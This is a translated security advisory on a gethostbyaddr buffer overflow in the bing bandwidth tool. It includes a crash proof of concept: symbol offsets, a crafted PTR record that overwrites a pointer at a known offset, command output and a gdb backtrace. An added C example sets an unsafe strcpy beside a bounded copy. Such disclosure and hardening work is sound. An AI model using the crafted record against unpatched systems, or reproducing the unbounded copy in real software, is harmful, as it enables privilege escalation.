bing gethostbyaddr buffer overflow

Published: 2001-02-01
Updated: 2001-02-01

Affected systems:

    Pierre Beyssac bing 1.0.4 and earlier
       + S.u.S.E. Linux 6.4
       + S.u.S.E. Linux 6.3
       + S.u.S.E. Linux 6.2
       + S.u.S.E. Linux 6.1
Description:

bing is an open-source package written by Pierre Beyssac. It measures the
bandwidth between two points by sending ICMP echo packets of varying sizes and
recording the round-trip times.

bing stores the host name returned by gethostbyaddr() in a fixed 80-byte static
buffer. A malicious user who controls a DNS server can forge a reverse (PTR)
record to overflow this buffer and thereby obtain root privileges.

<* Source: Paul Starzetz (paul@starzetz.de) *>



Test method:

Warning

The following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!


Paul Starzetz (paul@starzetz.de) provided the following test method:

Looking at the symbol table I found that:

paul@phoenix:~/tmp2/bing > objdump --syms /usr/bin/bing|grep "0804f4"
0804f4ac l     O .bss   00000001 nrand
0804f4a8 l     O .bss   00000004 lastrand
0804f420 l     O .bss   00000050 buf.34
0804f470 l     O .bss   00000004 old_rrlen.37
0804f480 l     O .bss   00000028 old_rr.38
0804f4b0 l     O .bss   00000004 objects
0804f4c0 g     O .bss   0000ffbc outpack

There are 6 variables which we can overwrite, though. The offset from
buf to objects hook is 144 (dec). To demonstrate this set up a bogus
reverse zone with a revptr like this:

"overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.
overfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.o
verfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil"

AbCd is the place where 'objects' will be overwritten. A simple check
confirms this:

root@phoenix:/var/named > /etc/rc.d/named start
Starting name server.done

root@phoenix:/var/named > host 192.168.100.5
5.100.168.192.IN-ADDR.ARPA domain name pointer
overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.o
verfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.ov
erfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil

root@phoenix:/var/named > bing -v -e1 -c1 192.168.100.5 192.168.100.5
BING    192.168.100.5 (192.168.100.5) and 192.168.100.5 (192.168.100.5)
        44 and 108 data bytes
52 bytes from
overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.o
verfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.ov
erfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil
(192.168.100.5): Echo Request

116 bytes from
overflo1.overflo2.overflo3.overflo4.overflo5.overflo6.overflo7.overflo8.overflo9.o
verfloa.overflob.overfloc.overflod.overfloe.overflof.overfl10.AbCdHERE.overfl12.ov
erfl13.overfl14.overfl15.overfl16.overfl17.overfl18.overfl19.overfl2a.mil
(192.168.100.5): Echo Request


--- 192.168.100.5 statistics ---
bytes   out    in   dup  loss   rtt (ms): min       avg       max
   44     1     1          0%           9.621     9.621     9.621
  108     1     1          0%           7.477     7.477     7.477

--- 192.168.100.5 statistics ---
bytes   out    in   dup  loss   rtt (ms): min       avg       max
   44     1     0        100%
  108     1     0        100%

not enough received packets to estimate link characteristics.
resetting after 1 samples.
Segmentation fault

This happens after bing has finished its work and the libc stuff is
being executed:

root@phoenix:/var/named > gdb /usr/local/bing
GNU gdb 4.17.0.11 with Linux support

(gdb) set args -v -e1 -c1 192.168.100.5 192.168.100.5
(gdb) run
Starting program: /usr/bin/bing -v -e1 -c1 192.168.100.5 192.168.100.5
..
..
Program received signal SIGSEGV, Segmentation fault.
0x804cc36 in __deregister_frame_info (begin=0x804f1e0) at ./frame.c:581

(gdb) bt
#0  0x804cc36 in __deregister_frame_info (begin=0x804f1e0) at
../frame.c:581
#1  0x8048d01 in __do_global_dtors_aux ()
#2  0x804cf55 in _fini ()
#3  0x400320f5 in exit (status=0) at exit.c:55
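
The fixed-buffer copy described above, shown beside a bounded replacement, as an added example written for this page (reconstructed from the advisory, not bing's source): the unsafe and the hardened copy side by side, plus a check that reports how far the advisory's constructed PTR name would overrun the 80-byte buffer. The label arithmetic in build_bogus_ptr() reproduces the offset of 144 quoted above; HOSTBUF_LEN, hostbuf and all function names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* bing's static hostname buffer is 80 bytes (objdump above: buf.34, size 0x50). */
#define HOSTBUF_LEN 80
static char hostbuf[HOSTBUF_LEN];

/* Vulnerable pattern the advisory describes (reconstructed, not bing's source):
 * an unbounded copy of gethostbyaddr()'s h_name into the fixed buffer. */
static char *copy_name_unsafe(char *dst, const char *h_name)
{
    return strcpy(dst, h_name); /* writes strlen(h_name)+1 bytes whatever dst holds */
}

/* Hardened form: bounded and always NUL-terminated. Returns 1 if the name was
 * truncated, so the caller can log or reject an oversized PTR record. */
static int copy_name_safe(char *dst, size_t dstlen, const char *h_name)
{
    size_t n = strlen(h_name);
    int truncated = n >= dstlen;
    if (truncated)
        n = dstlen - 1;
    memcpy(dst, h_name, n);
    dst[n] = '\0';
    return truncated;
}

/* Bytes the name would write past the 80-byte buffer (NUL included); 0 if it fits. */
static size_t overflow_bytes(const char *h_name)
{
    size_t need = strlen(h_name) + 1;
    return need > HOSTBUF_LEN ? need - HOSTBUF_LEN : 0;
}

/* Constructed input: the 26-label PTR name from the advisory. Each label is
 * 8 chars plus a dot, so label i starts at byte 9*i; "AbCdHERE" is label 16,
 * which is where the offset of 144 quoted above comes from. */
static const char *build_bogus_ptr(void)
{
    static const char *labels[] = {
        "overflo1", "overflo2", "overflo3", "overflo4", "overflo5", "overflo6", "overflo7",
        "overflo8", "overflo9", "overfloa", "overflob", "overfloc", "overflod", "overfloe",
        "overflof", "overfl10", "AbCdHERE", "overfl12", "overfl13", "overfl14", "overfl15",
        "overfl16", "overfl17", "overfl18", "overfl19", "overfl2a" };
    static char name[256];
    size_t pos = 0;
    for (size_t i = 0; i < sizeof labels / sizeof *labels; i++, pos += 9) {
        memcpy(name + pos, labels[i], 8);
        name[pos + 8] = '.';
    }
    memcpy(name + pos, "mil", 4); /* trailing "mil" plus NUL terminator */
    return name;
}
```

With the constructed name the safe copy reports truncation and keeps 79 characters, while the unsafe pattern would write 158 bytes past the end of hostbuf, into the .bss variables listed in the objdump output above.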


Recommendation:

Vendor patch:

    Pierre Beyssac has released bing 1.0.5 to address this issue:
    http://www.freenix.org/reseau/bing-1.0.5.tar.gz


This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.